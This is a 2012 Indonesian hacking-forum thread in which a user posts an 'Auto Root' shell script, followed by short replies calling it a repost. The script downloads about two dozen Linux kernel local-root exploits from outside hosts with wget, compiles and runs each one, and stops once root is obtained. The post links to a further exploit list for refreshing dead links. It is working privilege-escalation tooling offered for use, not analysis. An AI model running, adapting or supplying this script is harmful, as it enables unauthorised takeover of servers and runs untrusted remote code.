Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 06-19-2013, 10:37 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 2 3 4 5 ... 16 Next »

[script]Autoo Root

Home General Computer Multimedia Business Lounge

Thread Closed 
Tweet
Threaded Mode | Linear Mode
[script]Autoo Root
06-27-2012, 09:15 PM
Post: #1
war0k Offline
./Devilz Officer
Posts: 88
Joined: Jun 2012
Reputation: 11
[script]Autoo Root
Udah pada tau kan? yaudah langsung tanceppp
berikut codenya

Code:
#!/bin/sh
# Auto Rooting Script ver 1.0
#   _____          __           __________               __
#  /  _  \  __ ___/  |_  ____   \______   \ ____   _____/  |_
# /  /_\  \|  |  \   __\/  _ \   |       _//  _ \ /  _ \   __\
#/    |    \  |  /|  | (  <_> )  |    |   (  <_> |  <_> )  |
#\____|__  /____/ |__|  \____/   |____|_  /\____/ \____/|__|
#        \/                             \/
#To start script "./aroot.sh"
#Developers: AnnexxEmpire, axe
#Greetz to all members of SSteam

checkroot() {
if [ "$(id -u)" = "0" ]; then
cd ..;
rm -r expl;
echo "Got root :D";
exit;
else
echo "No good. Still "`whoami`;
echo "";
fi;
}

uname -a;
mkdir expl;
cd expl;
echo "Checking if already root...";
checkroot;

echo "Trying wunderbar...";
wget http://www.tux-planet.fr/public/hack/exploits/kernel/sock-sendpage-local-root-exploit.tar.gz;
tar -xvf sock-sendpage-local-root-exploit.tar.gz;
cd sock-sendpage-local-root-exploit;
./wunderbar_emporium.sh;
checkroot;

echo "Trying gayros...";
wget http://www.tux-planet.fr/public/hack/exploits/kernel/local-root-exploit-gayros.c;
gcc -o gayros local-root-exploit-gayros.c;
./gayros;
checkroot;

echo "Trying vmsplice...";
wget http://www.tux-planet.fr/public/hack/exploits/kernel/vmsplice-local-root-exploit.c;
gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c;
./vmsplice-local-root-exploit;
checkroot;

echo "Trying 2.6.x localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x2;
./x2;
checkroot;

echo "Trying 2.6.24 localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.24/2.6.24x.c;
gcc 2.6.24x.c -o 2.6.24x;
./2.6.24x;
checkroot;

echo "Trying 2.4-2.6 [ pwned ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.4%202.6/pwned.c;
gcc pwned.c -o pwned;
./pwned;
checkroot;

echo "Trying 2.6.4 [ hudo ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.4/hudo.c;
gcc hudo.c -o hudo;
./hudo;
checkroot;

echo "Trying 2.6.9-22 [ prctl ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.9-22/prctl.c;
gcc prctl.c -o prctl;
./prctl;
checkroot;

echo "Trying 2.6.12 [ elfcd2 ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.12/elfcd2.c;
gcc elfcd2.c -o elfcd2;
./elfcd2;
checkroot;

echo "Trying 2.6.13-17 localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.13-17/2.6.13_17_4_2011.sh;
chmod 755 2.6.13_17_4_2011.sh;
./2.6.13_17_4_2011.sh;
checkroot;

echo "Trying 2.6.13 [ raptor-prctl ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.13/raptor-prctl.c;
gcc raptor-prctl.c -o raptor-prctl;
./raptor_prctl;
checkroot;

echo "Trying 2.6.14 [ raptor ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.14/raptor;
chmod 777 raptor;
./raptor;
checkroot;

echo "Trying 2.6.15 [ raptor ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.15/raptor;
chmod 777 raptor;
./raptor;
checkroot;

echo "Trying 2.6.17-4 [ raptor-prctl ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.17-4/raptor-prctl.c;
gcc raptor-prctl.c -o raptor-prctl;
./raptor-prctl;
checkroot;

echo "Trying 2.6.10 [ uselib24 ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.10/uselib24.c;
gcc uselib24.c -o uselib24;
./uselib24;
checkroot;

echo "Trying 2.6.11 [ krad ] localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.11/krad;
chmod 777 krad;
./krad;
checkroot;

echo "Trying 2.6.x localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x;
chmod 777 x;
./x;
checkroot;

echo "Trying 2.6.x [ uselib24 ] localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/uselib24;
chmod 777 uselib24;
./uselib24;
checkroot;

echo "Trying 2.6.x [ root2 ] localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/root2;
chmod 777 root2;
./root2;
checkroot;

echo "Trying 2.6.x [ kmod2 ] localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/kmod2;
chmod 777 kmod2;
./kmod2;
checkroot;

echo "Trying 2.6.23 localroot...";
wget http://s3ym3n.by.ru/localroot/2.6.23/2.6.23.c;
gcc 2.6.23.c -o 2.6.23;
./2.6.23;
checkroot;

echo "Trying 2.6.x localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/exp.sh;
chmod 755 exp.sh;
./exp.sh;
checkroot;

echo "Trying 2.6.x [ elflbl ] localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/elflbl;
chmod 777 elflbl;
./elflbl;
checkroot;

echo "Trying 2.6.x [ cw7.3 ] localroot...";
wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/cw7.3;
chmod 777 cw7.3;
./cw7.3;
checkroot;

echo "Done with exploits. Failed to achieve root :<";

Kebanyakan Link sudah mati ngakak behahahaha
ganti aja link wget, listnya ada disini
http://th3-0utl4ws.com/Database/index.ph...2FLinux%2F

Thanks buat om wahyu_devilzc0de™ hore
Find all posts by this user
06-27-2012, 09:16 PM
Post: #2
rusuh Away
sepik'ers
**
Moderators
Posts: 455
Joined: Oct 2011
Reputation: 77
RE: [script]Autoo Root
tested kah?
Visit this user's website Find all posts by this user
06-27-2012, 09:19 PM
Post: #3
DC™Rebels Offline
Alayer_Terbaik_di DC
Posts: 878
Joined: Jun 2012
Reputation: 12
RE: [script]Autoo Root
udah di tested kah ?
Visit this user's website Find all posts by this user
06-27-2012, 09:26 PM
Post: #4
wahyu_devilzc0de™ Offline
Rest In Peace
***
Posts: 1,573
Joined: Dec 2009
Reputation: 191
RE: [script]Autoo Root
maaf ya kak war0k, repost tritnya ketawa . sebelumnya sampean bisa search dl, apakah udah ada postingan atau blm peace
tetep semangat kak mantap

ni yg thn 2011 http://devilzc0de.org/forum/thread-9283....=auto+root
ni thn 2012 http://devilzc0de.org/forum/thread-14767...=auto+root
Visit this user's website Find all posts by this user
« Next Oldest | Next Newest »
Thread Closed 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
Bug Auto Root [2012] MaViA_HaXx0r 23 1,275 05-22-2013 04:53 AM
Last Post: cimpli
  webroot.pl for exploits webserver to root kiddies 7 363 03-01-2013 08:44 AM
Last Post: mrcuex
  php root shell exploit buat mesin x86_64 (tanpa bind dan bc) mywisdom 38 1,724 10-01-2012 10:06 PM
Last Post: Danzel
  kernel-2.6.18-164 2010 Local Root Exploit numlock 5 356 08-11-2012 11:37 PM
Last Post: d4rk_kn19ht
  [help]local root exploit dan backconnect EksMillionere 10 668 02-06-2012 02:01 PM
Last Post: EksMillionere
  [Solved] script ini katanya bisa buat jumping (perl) hakimarx 5 334 01-06-2012 10:57 PM
Last Post: wahyu_devilzc0de™
  Eksploitasi Race Condition pada Policy Kit 0.96 di Linux untuk Mendapatkan Akses Root starz³ 6 137 11-06-2011 01:46 AM
Last Post: Vanzoel
  FreeBSD 8.*, 7.* Local ‘root’ Exploit chaer.newbie 10 415 10-17-2011 09:09 AM
Last Post: mywisdom
Smile Auto root laTest kernel 2011 xymcrush17 7 272 07-23-2011 12:03 PM
Last Post: mariachi
  [Ask] local root exploit victim001 11 398 07-19-2011 11:51 PM
Last Post: shendo

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 06-19-2013, 10:37 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE